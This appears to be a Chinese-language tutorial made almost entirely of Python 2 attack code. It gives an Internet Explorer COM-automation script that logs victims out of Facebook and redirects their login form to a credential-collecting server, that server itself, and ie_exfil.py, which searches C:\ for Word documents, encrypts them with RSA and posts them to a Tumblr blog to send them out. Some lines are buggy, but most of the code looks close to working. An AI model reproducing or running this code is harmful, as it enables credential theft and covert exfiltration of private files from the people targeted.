基于浏览器的中间人攻击
#coding=utf-8
import win32com.client
import time
import urlparse
import urllib data_receiver = "http://localhost:8080/" target_sites = {}
target_sites["www.facebook.com"] = {
"logout_url" : None,
"logout_form" : "logout_form",
"login_form_index" : 0,
"owned" : False
} #IE浏览器类的ID号
clsid = '{9BA05972-F6A8-11CF-A442-00A0C90A8F39}' windows = win32com.client.Dispatch(clsid) while True:
for browser in windows:
url = urlparse.urlparse(browser.LocationUrl)
if url.hostname in target_sites:
if target_sites[url.hostname]["owned"]:
continue
#如果有一个URL,我们可以重定向
if target_sites[url.hostname]["logout_url"]:
browser.Navigate(target_sites[url.hostname]["logout_url"])
wait_for_browser(browser)
else:
#检索文件中的所有元素
full_doc = browser.Document.all
#
for i in full_doc:
try:
#找到退出登录的表单并提交
if i.id == target_sites[url.hostname]["logout_url"]:
i.submit()
wait_for_browser(browser)
except:
pass #现在来修改登录表单
try:
login_index = target_sites[url.hostname]["login_form_index"]
login_page = urllib.quote(browser.LocationUrl)
browser.Document.forms[login_index].action = "%s%s"%(data_receiver,login_page)
target_sites[url.hostname]["owned"] = True
except:
pass
time.sleep(5) def wait_for_browser(browser):
#等待浏览器加载完一个页面
while browser.ReadyState != 4 and browser.ReadyState != "complete":
time.sleep(0.1) return
创建接收服务器
import SimpleHTTPServer
import SocketServer
import urllib class CredRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
"""docstring for CredRequestHandler"""
def do_POST(self):
content_length = int(self.headers['Content-Length'])
creds = self.rfile.read(content_length).decode('utf-8')
print creds
site = self.path[1:]
self.send_response(301)
self.send_headers('Location',urllib.unquote(site))
self.end_headers() server = SocketServer.TCPServer(('0.0.0.0',8080),CredRequestHandler)
server.serve_forever()
利用IE的COM组件自动化技术窃取数据
keygen.py:
#!/usr/bin/python
from Crypto.PublicKey import RSA new_key = RSA.generate(2048,e=65537)
public_key = new_key.publickey().exportKey("PEM")
private_key = new_key.exportKey("PEM") print public_key
print private_key
decrypto.py:
#coding=utf-8
import zlib
import base64
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_OAEP private_key = "输入产生的公钥" rsakey = RSA.importKey(private_key)
rsakey = PKCS1_OAEP.new(rsakey) chunk_size = 256
offset = 0
decrypted = ""
encrypted = base64.b64decode(encrypted) while offset < len(encrypted):
decrypted += rsakey.decrypted(encrypted[offset:offset+chunk_size])
offset += chunk_size #解压负载
plaintext = zlib.decompress(decrypted) print plaintext
这段代码用于将赖在tumblr的编码文件进行base64解码,从而形成原始的明文字符串,最后进行负载解压。
ie_exfil.py:
#coding=utf-8
import win32com.client
import os
import fnmatch
import time
import random
import zlib
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_OAEP doc_type = ".doc"
username = "lyshark"
password = "" public_key = "公钥" def wait_for_browser(browser):
#等待浏览器加载完一个页面
while browser.ReadyState != 4 and browser.ReadyState != "complete":
time.sleep(0.1) return def encrypt_string(plaintext):
chunk_size = 256
print "Compressing: %d bytes"%len(plaintext)
plaintext = zlib.compress(plaintext) print "Encrypting %d bytes"%len(plaintext) rsakey = RSA.importKey(public_key)
rsakey = PKCS1_OAEP.new(rsakey) encrypted = ""
offset = 0 while offset < len(plaintext):
chunk = plaintext[offset:offset+chunk_size] if len(chunk) % chunk_size != 0:
chunk += " " * (chunk_size - len(chunk)) encrypted += rsakey.encrypt(chunk)
offset += chunk_size encrypted = encrypted.encode("base64") print "Base64 encoded crypto: %d"%len(encrypted) return encrypted def encrypt_post(filename):
#打开并读取文件
fd = open(filename,"rb")
contents = fd.read()
fd.close() encrypted_title = encrypt_string(filename)
encrypted_body = encrypt_string(contents) return encrypted_title,encrypted_body def random_sleep():
time.sleep(random.randint(5,10))
return def login_to_tumblr(ie):
#解析文档中的所有元素
full_doc = ie.Document.all #迭代每个元素来查找登录表单
for i in full_doc:
if i.id == "signup_email":
i.setAttribute("value",username)
elif i.id == "signup_password":
i.setAttribute("value",password) random_sleep() try:
#你会遇到不同的登陆主页
if ie.Document.forms[0].id == "signup_form":
ie.Document.forms[0].submit()
else:
ie.Document.forms[1].submit()
except IndexError, e:
pass random_sleep() #登陆表单是登录页面中的第二个表单
wait_for_browser(ie) return def post_to_tumblr(ie,title,post):
full_doc = ie.Document.all for i in full_doc:
if i.id == "post_one":
i.setAttribute("value",title)
title_box = i
i.focus()
elif i.id == "post_two":
i.setAttribute("innerHTML",post)
print "Set text area"
i.focus()
elif i.id == "create_post":
print "Found post button"
post_form = i
i.focus() #将浏览器的焦点从输入主体内容的窗口上移开
random_sleep()
title_box.focus()
random_sleep() #提交表单
post_form.children[0].click()
wait_for_browser(ie) random_sleep() return def exfiltrate(document_path):
ie = win32com.client.Dispatch("InternetExplorer.Application")
ie.Visible = 1 #访问tumblr站点并登录
ie.Navigate("https://www.tumblr.com/login")
wait_for_browser(ie) print "Logging in..."
login_to_tumblr(ie)
print "Logged in...navigating" ie.Navigate("https://www.tumblr.com/new/text")
wait_for_browser(ie) #加密文件
title,body = encrypt_post(document_path) print "Creating new post..."
post_to_tumblr(ie,title,body)
print "Posted!" #销毁IE实例
ie.Quit()
ie = None return #用户文档检索的循环
#注意:以下这段代码的第一行没有“tab”缩进
for parent,directories,filenames in os.walk("C:\\"):
for filename in fnmatch.filter(filenames,"*%s"%doc_type):
document_path = os.path.join(parent,filename)
print "Found: %s"%document_path
exfiltrate(document_path)
raw_input("Continue?")
代码用于捕获本地文件系统中的Word文档,并利用公钥对其进行加密,然后自动启动进程将加密的文档提交到一个位于tumblr.com站点的博客上